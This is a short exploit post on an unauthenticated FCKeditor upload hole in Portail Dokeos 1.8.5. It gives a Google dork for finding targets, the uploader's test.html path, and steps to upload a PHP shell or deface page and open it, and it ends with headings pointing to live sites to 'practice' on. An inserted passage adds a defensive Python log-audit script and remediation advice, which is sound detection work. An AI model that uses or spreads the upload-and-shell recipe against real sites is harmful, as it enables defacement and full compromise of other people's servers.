"Portail Dokeos" deface and Shell Upload vulnerability
The Portail Dokeos vulnerability is a kind of FCKeditor remote file upload vulnerability.
With this vulnerability, an attacker can upload a shell, a deface page, or any other file to the website without an admin username and password.
Google Dork: "Portail Dokeos 1.8.5"
Exploit: http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Go to http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html, change ASP to PHP as with FCKeditor, and upload your deface page, shell, or file. You can upload .html, .php, .jpg, and .txt formats here.
To view your uploaded file, go here: http://website/patch/main/upload/your file here
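For site owners, the two paths above are what to look for in web server logs. The following is an added example, not part of the original post: it scans an access log in common log format for requests to the FCKeditor upload directory and for script or HTML files served from `main/upload/`. The sample log lines, IP addresses, file names, and the POST target under `upload/` are constructed assumptions.

```python
import re
from collections import defaultdict

# Paths come from the post; whatever precedes "main/" varies per install.
UPLOADER = re.compile(r"/main/inc/lib/fckeditor/editor/filemanager/upload/", re.I)
# Files that PHP will execute or a browser will render if served from the upload folder.
SERVED = re.compile(r"/main/upload/[^/?]+\.(?:php\d?|phtml|html?)(?:\?|$)", re.I)
# Common log format: ip ident user [time] "METHOD path proto" status
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample log (documentation IP ranges, made-up file names).
# The POST target under upload/ is an assumed connector path, not from the post.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2013:10:01:02 +0000] "GET /main/inc/lib/fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 200 1843
203.0.113.7 - - [12/Mar/2013:10:01:40 +0000] "POST /main/inc/lib/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 200 212
203.0.113.7 - - [12/Mar/2013:10:02:05 +0000] "GET /main/upload/x.php?a=1 HTTP/1.1" 200 77
198.51.100.20 - - [12/Mar/2013:10:05:00 +0000] "GET /main/upload/photo.jpg HTTP/1.1" 200 50211
198.51.100.9 - - [12/Mar/2013:11:00:00 +0000] "GET /main/inc/lib/fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 404 310
"""

def audit(log_text):
    """Group uploader requests and served upload-folder scripts by client IP."""
    seen = defaultdict(lambda: {"uploader": [], "served": []})
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in common log format
        ip, method, path, status = m.groups()
        if UPLOADER.search(path):
            seen[ip]["uploader"].append((method, int(status), path))
        elif SERVED.search(path) and status.startswith("2"):
            seen[ip]["served"].append(path)
    return dict(seen)

def likely_compromise(seen):
    """IPs with a successful POST to the uploader and a script/HTML fetch."""
    return sorted(
        ip for ip, s in seen.items()
        if s["served"] and any(m == "POST" and 200 <= c < 300 for m, c, _ in s["uploader"])
    )

def exposed_uploader(seen):
    """True if any request to the uploader directory got a 2xx answer."""
    return any(200 <= c < 300 for s in seen.values() for _, c, _ in s["uploader"])

if __name__ == "__main__":
    result = audit(SAMPLE_LOG)
    print("uploader reachable:", exposed_uploader(result))
    print("review these clients:", likely_compromise(result))
```

Matching by client IP is a heuristic, since an uploaded file can be fetched from a different address. Any 2xx response under the uploader directory is reason enough to remove `test.html`, restrict that directory, and review the contents of `main/upload/`.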
Live Demo:
Other websites for practice: